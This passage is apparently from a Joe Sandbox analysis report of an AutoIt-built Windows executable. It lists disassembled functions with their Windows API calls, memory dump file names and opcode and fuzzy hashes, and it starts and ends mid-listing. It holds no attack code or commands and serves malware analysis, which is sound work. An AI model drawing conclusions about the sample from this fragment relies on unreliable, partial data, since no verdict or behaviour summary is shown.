                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CFB5F5
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ClientRectScreen$InvalidateWindow
                    • String ID:
                    • API String ID: 357397906-0
                    • Opcode ID: 40e485cf831e6e6cb70e1ec940f82dc632f5ae4ee68b64913c460cff5efad34c
                    • Instruction ID: 4946acbe609c28785223499d97da60b333fcc92249a5061ed70ce4421413c739
                    • Opcode Fuzzy Hash: 40e485cf831e6e6cb70e1ec940f82dc632f5ae4ee68b64913c460cff5efad34c
                    • Instruction Fuzzy Hash: 511134B9D00209EFDB41CF99C484AEEBBB5FF08310F104166E914E2220D735AA55CF51
                    Function 00CFB8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00CFB8FE
                    • _memset.LIBCMT ref: 00CFB90D
                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00D37F20,00D37F64), ref: 00CFB93C
                    • CloseHandle.KERNEL32 ref: 00CFB94E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _memset$CloseCreateHandleProcess
                    • String ID:
                    • API String ID: 3277943733-0
                    • Opcode ID: 61b29bc9fac16cb1aea04ea1bfdba53fef4132b42a5c86e6ce23746137c0be1a
                    • Instruction ID: 71513155e1003680ec556b6640ea260453bba0ef5091b5ec8148b8703d422747
                    • Opcode Fuzzy Hash: 61b29bc9fac16cb1aea04ea1bfdba53fef4132b42a5c86e6ce23746137c0be1a
                    • Instruction Fuzzy Hash: 5EF03AF26447447BE6202761AC09FBB3B9CFF08394F000020BA08D52A2D7714910C7B9
                    Function 00CD6E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                    Download Yara Rule
                    APIs
                    • RtlEnterCriticalSection.NTDLL(?), ref: 00CD6E88
                      • Part of subcall function 00CD794E: _memset.LIBCMT ref: 00CD7983
                    • _memmove.LIBCMT ref: 00CD6EAB
                    • _memset.LIBCMT ref: 00CD6EB8
                    • RtlLeaveCriticalSection.NTDLL(?), ref: 00CD6EC8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: CriticalSection_memset$EnterLeave_memmove
                    • String ID:
                    • API String ID: 48991266-0
                    • Opcode ID: f4806f57d8a909b80df6e977ced0f17c4bd3a7e19fba69ec5263228599abfe0a
                    • Instruction ID: 0ff1149d8df4310ee8f196051b8cbcb683f36fbb80a765bbe3294dee7b9e8348
                    • Opcode Fuzzy Hash: f4806f57d8a909b80df6e977ced0f17c4bd3a7e19fba69ec5263228599abfe0a
                    • Instruction Fuzzy Hash: 3BF0F47A104214ABCF016F55DC85B59BB29EF45360B048065FE085E21BC731A961DBB5
                    Function 00CFC00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C712F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C7134D
                      • Part of subcall function 00C712F3: SelectObject.GDI32(?,00000000), ref: 00C7135C
                      • Part of subcall function 00C712F3: BeginPath.GDI32(?), ref: 00C71373
                      • Part of subcall function 00C712F3: SelectObject.GDI32(?,00000000), ref: 00C7139C
                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00CFC030
                    • LineTo.GDI32(00000000,?,?), ref: 00CFC03D
                    • EndPath.GDI32(00000000), ref: 00CFC04D
                    • StrokePath.GDI32(00000000), ref: 00CFC05B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                    • String ID:
                    • API String ID: 1539411459-0
                    • Opcode ID: a3bab9e2a475b6c39a25e5a5824da2af589cfda00cf8213392c4ffe7b6250175
                    • Instruction ID: 319b7b6511f82cffa4a08a8a07a8d950421c254160c586bbabbaf1fbed53f53a
                    • Opcode Fuzzy Hash: a3bab9e2a475b6c39a25e5a5824da2af589cfda00cf8213392c4ffe7b6250175
                    • Instruction Fuzzy Hash: F4F05E3110525DBBDB126F54AC09FEE3F59AF0A311F048014FB11611E28B755652DBAA
                    Function 00CCA37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00CCA399
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00CCA3AC
                    • GetCurrentThreadId.KERNEL32 ref: 00CCA3B3
                    • AttachThreadInput.USER32(00000000), ref: 00CCA3BA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                    • String ID:
                    • API String ID: 2710830443-0
                    • Opcode ID: e42684dadb46155faa9f6b3e53598c74e2c230b86d8b03957d0c148a43bd4183
                    • Instruction ID: 853b47ccdb8f174ea0e99e882e4a1a7919a515328229bb89ed9cdf7aeabf4c9d
                    • Opcode Fuzzy Hash: e42684dadb46155faa9f6b3e53598c74e2c230b86d8b03957d0c148a43bd4183
                    • Instruction Fuzzy Hash: 19E0C03154526CBADB205BA2DC0DFEF7F5CEF157A5F048029F509D5060CA75C941D7A1
                    Function 00C72218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                    Download Yara Rule
                    APIs
                    • GetSysColor.USER32(00000008), ref: 00C72231
                    • SetTextColor.GDI32(?,000000FF), ref: 00C7223B
                    • SetBkMode.GDI32(?,00000001), ref: 00C72250
                    • GetStockObject.GDI32(00000005), ref: 00C72258
                    • GetWindowDC.USER32(?,00000000), ref: 00CAC0D3
                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00CAC0E0
                    • GetPixel.GDI32(00000000,?,00000000), ref: 00CAC0F9
                    • GetPixel.GDI32(00000000,00000000,?), ref: 00CAC112
                    • GetPixel.GDI32(00000000,?,?), ref: 00CAC132
                    • ReleaseDC.USER32(?,00000000), ref: 00CAC13D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                    • String ID:
                    • API String ID: 1946975507-0
                    • Opcode ID: bd6cb0fed09ec2cb7eddf37f987a1e6dbef8e1dc9d98f96374efcf6dd0a3e564
                    • Instruction ID: 3d2ce3e210361437cbb3e989b7b55c2e819d70f3dfb9f256637f905bc814fdb6
                    • Opcode Fuzzy Hash: bd6cb0fed09ec2cb7eddf37f987a1e6dbef8e1dc9d98f96374efcf6dd0a3e564
                    • Instruction Fuzzy Hash: 2CE0C932604245EBDB215FA4EC497EC7B24EB16336F14C36AFA79580E187724A91DB12
                    Function 00CC8C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentThread.KERNEL32 ref: 00CC8C63
                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,00CC882E), ref: 00CC8C6A
                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00CC882E), ref: 00CC8C77
                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,00CC882E), ref: 00CC8C7E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: CurrentOpenProcessThreadToken
                    • String ID:
                    • API String ID: 3974789173-0
                    • Opcode ID: fdc80e7092e5728bdedd246139044fdd6f090cca28d6a9b9e526ce29bcfad03a
                    • Instruction ID: 39258bcb4075ade09cec82d7f108dae229375d1ebae2f681b3b77cae8e79a4a9
                    • Opcode Fuzzy Hash: fdc80e7092e5728bdedd246139044fdd6f090cca28d6a9b9e526ce29bcfad03a
                    • Instruction Fuzzy Hash: 93E04F366423119BD7205FB0AD0CF6B3BA8EF50792F18483CE245C9050DA748446CB62
                    Function 00CB2187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                    Download Yara Rule
                    APIs
                    • GetDesktopWindow.USER32 ref: 00CB2187
                    • GetDC.USER32(00000000), ref: 00CB2191
                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00CB21B1
                    • ReleaseDC.USER32(?), ref: 00CB21D2
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: CapsDesktopDeviceReleaseWindow
                    • String ID:
                    • API String ID: 2889604237-0
                    • Opcode ID: e3ad7a61bebbed1e181c75ed65e3b2fc85f1ea3ab5de0768d54fd7a4641f2360
                    • Instruction ID: 01979f492415f5edee5b5107218c94307061de01840eac2dbf2fc0ef96d0990c
                    • Opcode Fuzzy Hash: e3ad7a61bebbed1e181c75ed65e3b2fc85f1ea3ab5de0768d54fd7a4641f2360
                    • Instruction Fuzzy Hash: 23E0CAB5800204AFDB019FA1C888BAD7BB1EF48360F108429F95AE6220CB388542EF42
                    Function 00CB219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                    Download Yara Rule
                    APIs
                    • GetDesktopWindow.USER32 ref: 00CB219B
                    • GetDC.USER32(00000000), ref: 00CB21A5
                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00CB21B1
                    • ReleaseDC.USER32(?), ref: 00CB21D2
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: CapsDesktopDeviceReleaseWindow
                    • String ID:
                    • API String ID: 2889604237-0
                    • Opcode ID: d5af7759e340f077a67aaf077aa60b73209a75d4b5ce88c19a8470fd212651b4
                    • Instruction ID: 0074495bf1bc57b2ba8a19eb666e2833c6b4eed3d16bde3fa899bbd0bed0a1c0
                    • Opcode Fuzzy Hash: d5af7759e340f077a67aaf077aa60b73209a75d4b5ce88c19a8470fd212651b4
                    • Instruction Fuzzy Hash: B5E0CAB5800204AFCB019FA088887AD7AA1EF48320B108029F95AE6220CB389142EF42
                    Function 00CE9A72 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 242COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00CC7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00CC758C,80070057,?,?), ref: 00CC7698
                    • _memset.LIBCMT ref: 00CE9B28
                    • _memset.LIBCMT ref: 00CE9C6B
                    Strings
                    • NULL Pointer assignment, xrefs: 00CE9CF0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _memset$lstrcmpi
                    • String ID: NULL Pointer assignment
                    • API String ID: 1020867613-2785691316
                    • Opcode ID: 51565564f83fcd2af56115d5b20266d9a9b59bb7ecce3f41090e245f49b97171
                    • Instruction ID: 9b063512aed41b5fb9dfce74df1c110e7963752180eb9a48f8d2b2f783ee7c5d
                    • Opcode Fuzzy Hash: 51565564f83fcd2af56115d5b20266d9a9b59bb7ecce3f41090e245f49b97171
                    • Instruction Fuzzy Hash: 3F913A71D00229ABDF10DFA5DC85ADEBBB8FF08710F20816AF519A7281DB705A45DFA0
                    Function 00CCB7B6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                    Download Yara Rule
                    APIs
                    • OleSetContainedObject.OLE32(?,00000001), ref: 00CCB981
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ContainedObject
                    • String ID: AutoIt3GUI$Container
                    • API String ID: 3565006973-3941886329
                    • Opcode ID: 81dc4f5c63ea89ef0b062a6880cf810938fa21f5551d09c6e61aee67c0155894
                    • Instruction ID: 52b645b53650ba95d67d735dd48d0c82a0f43c0c60035fb38c7d5f3edf7c3bb7
                    • Opcode Fuzzy Hash: 81dc4f5c63ea89ef0b062a6880cf810938fa21f5551d09c6e61aee67c0155894
                    • Instruction Fuzzy Hash: 609129706006019FDB24DFA8C885F6AB7E9FF48710F24856EE959CB691DB70ED41CB60
                    Function 00CDB217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C8FEC6: _wcscpy.LIBCMT ref: 00C8FEE9
                      • Part of subcall function 00C79997: __itow.LIBCMT ref: 00C799C2
                      • Part of subcall function 00C79997: __swprintf.LIBCMT ref: 00C79A0C
                    • __wcsnicmp.LIBCMT ref: 00CDB298
                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00CDB361
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                    • String ID: LPT
                    • API String ID: 3222508074-1350329615
                    • Opcode ID: 5564c4e4d8d3742da6e484c2b94ecba9bb59e98bc8ca2c9bb79bf55e9834b39c
                    • Instruction ID: 301d6f7e37f398435a1d2f104607a51b0e63e50f19163dffc46991125ce3cd7b
                    • Opcode Fuzzy Hash: 5564c4e4d8d3742da6e484c2b94ecba9bb59e98bc8ca2c9bb79bf55e9834b39c
                    • Instruction Fuzzy Hash: 12618575A00215EFCB14DF94C885EAEB7F4EF48310F16815AF656AB3A1DB70AE40DB50
                    Function 00C82AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                    Download Yara Rule
                    APIs
                    • Sleep.KERNEL32(00000000), ref: 00C82AC8
                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00C82AE1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: GlobalMemorySleepStatus
                    • String ID: @
                    • API String ID: 2783356886-2766056989
                    • Opcode ID: 2f9731a4a49693ffd146d8f22ebd65681e4e901302d6f4c07b10dec17fbc3bb4
                    • Instruction ID: 10ffe5c91a69e36c5bf802bd8c096b6b41f07f512934e4579d1a5ab650363888
                    • Opcode Fuzzy Hash: 2f9731a4a49693ffd146d8f22ebd65681e4e901302d6f4c07b10dec17fbc3bb4
                    • Instruction Fuzzy Hash: 44514771418744ABD320AF10D886BAFBBF8FF85314F42885DF1E9811A1DB308529DB27
                    Function 00CD99BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C7506B: __fread_nolock.LIBCMT ref: 00C75089
                    • _wcscmp.LIBCMT ref: 00CD9AAE
                    • _wcscmp.LIBCMT ref: 00CD9AC1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _wcscmp$__fread_nolock
                    • String ID: FILE
                    • API String ID: 4029003684-3121273764
                    • Opcode ID: ebc8b8379762eccc4f8550d10b29899c3de5ed070c731170bfce8c45e8904579
                    • Instruction ID: f9ed7fa3e9cbdf3ed65f75635b0327ee863b422214d789688d737f5cf4d91570
                    • Opcode Fuzzy Hash: ebc8b8379762eccc4f8550d10b29899c3de5ed070c731170bfce8c45e8904579
                    • Instruction Fuzzy Hash: 3741F675A00619BBDF209AA0DC85FEFBBBDDF45710F01406ABA04B72C1DBB19E0497A1
                    Function 00CE2882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00CE2892
                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00CE28C8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: CrackInternet_memset
                    • String ID: |
                    • API String ID: 1413715105-2343686810
                    • Opcode ID: 00d3cf248e47f71f526a8bc0741c3253cd7d07db09f63a84a38845e1331b5882
                    • Instruction ID: 745d4f7cc01e5e2a7234b2a3b252a6b30bbfa56dd923a1b1a9bb42dcd2883121
                    • Opcode Fuzzy Hash: 00d3cf248e47f71f526a8bc0741c3253cd7d07db09f63a84a38845e1331b5882
                    • Instruction Fuzzy Hash: 6F313E71800219AFCF01EFA1DC85EEEBFB9FF08310F104129F819A6166DB315A56DB61
                    Function 00CF6CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                    Download Yara Rule
                    APIs
                    • DestroyWindow.USER32(?,?,?,?), ref: 00CF6D86
                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00CF6DC2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
